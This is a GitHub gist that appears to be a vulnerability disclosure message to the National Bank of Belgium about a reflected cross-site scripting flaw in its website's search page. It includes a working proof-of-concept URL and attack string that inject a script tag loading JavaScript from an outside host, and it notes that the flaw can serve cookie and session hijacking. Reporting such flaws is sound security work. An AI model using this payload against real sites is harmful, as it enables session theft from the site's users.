Created
August 12, 2014 18:29
-
-
Save MiguelBel/72bb9f1919be4d78a41a to your computer and use it in GitHub Desktop.
National Bank of Belgium
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Send to IT or IT-Security department ASAP. | |
| Hi, I found a vulnerability in your web (http://nbb.be), that allows to execute custom javascript code. | |
| --- | |
| Bypass Google Chrome Auditor: No | |
| Web: http://nbb.be | |
| Vulnerability: Reflected XSS | |
| PoC (Proof of concept): http://nbb.be/pub/App/Search/Search.aspx?l=en&q=xss%22%20style=%22font-size:99px;%22%3Escript%3C/a%3E%3Cscript%20src=%22https://gist.githubusercontent.com/MiguelBel/3c27aeba5b3e75442673/raw/2c78f786e0011939e4606e4fb67af69c73809050/Sample%20XSS%20attack%22%3C!-- | |
| Attack Vector: xss" style="font-size:99px;">script</a><script src="https://gist.githubusercontent.com/MiguelBel/3c27aeba5b3e75442673/raw/2c78f786e0011939e4606e4fb67af69c73809050/Sample XSS attack"<!-- | |
| Description: Allows to the user to execute custom javascript code that is used to hijack cookies and sessions.Can be very harmful for someone who have bad intention. | |
| Solution: Escape the special chars '';!--"<XSS>=&{()} | |
| Best regards and await your reply. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment